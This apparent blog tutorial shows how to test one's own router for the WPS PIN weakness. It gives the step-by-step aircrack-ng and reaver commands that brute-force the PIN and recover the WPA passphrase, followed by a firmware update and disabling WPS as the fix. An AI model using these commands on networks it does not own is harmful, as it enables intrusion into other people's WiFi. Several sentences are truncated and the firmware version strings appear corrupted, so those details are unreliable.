In order to test this, you must have a WiFi card with monitor mode. The Penguin Wireless N USB Adapter for GNU / Linux (TPE-N150USB) worked well for me.
ThinkPenguin USB WiFi cards typically use Atheros chipsets, and because ThinkPenguin uses predictable chipsets you can be certain you will receive an Atheros chipset for this device. With this card, you can use monitor mode. The range not be great, but if you are testing the security of your own home network, range should not matter much.
Install the necessary tools.
sudo apt-get install \ aircrack-ng \ reaver
Disable your WiFi interface.
sudo ifconfig wlan0 down
Enable monitor mode for your WiFi interface.
sudo airmon-ng start wlan0
Note the name of the monitoring device output from the command above. In my case, it is
Kill processes that may conflict with airmon tools.
sudo airmon-ng check kill
Scan for a network.
PWR indicates signal strength. A number like
-20 is superior to a number like
-74. The greater number is superior, and
-20 is greater than
sudo airodump-ng wlan0mon
Try to test for the WPS vulnerability against the AP using
reaver, which is specifically designed for this exploit. Specify your device’s channel with
-c and the BSSID (mac of the router) with
sudo reaver \ -i wlan0mon \ -b 22:46:BA:34:CB:18 \ -vv \ -L \ -N \ -d 30 \ -T 1
If your access point is vulnerable, the WPS pin will eventually be discovered.
[+] Pin cracked in 273832 seconds [+] WPS PIN: '29701453' [+] WPA PSK: 'thepassword123' [+] AP SSID: 'MyAccessPoint'
reaver only shows you the PIN and not the
PSK, you can find it like so.
sudo reaver \ -i wlan0mon \ -p 29701453 \ -b 22:46:BA:34:CB:18 \ -vv
My router was compromised in 273832 seconds, which is just over 3 days.
My Netgear WNR2000v3 was then updated to the latest firmware as listed here.
Current Firmware Version: V184.108.40.206 New Firmware Version: V220.127.116.11 Current GUI Language Version: V18.104.22.168 New GUI Language Version: V22.214.171.124
This upgrade automatically enables a 3 second lockout for failed WPS attempts.
reaver did not seem to care, and went to work hacking the PIN just as it did before. It was not affected by that lockout setting.
Fortunately, this firmware upgrade along with disabling WPS actually worked in my case, and
reaver was unable to determine my PIN.
- Constant receive timeout (0x03), or WPS transaction fail (0x02) with rtl8187
- WPS Cracking with Reaver
- How to Crack a Wi-Fi Network’s WPA Password with Reaver
- Hands-on: hacking WiFi Protected Setup with Reaver
- How do I install bully and mdk3 on Ubuntu 16.04 (Xenial Xerus)?
- aireplay invalid destination MAC address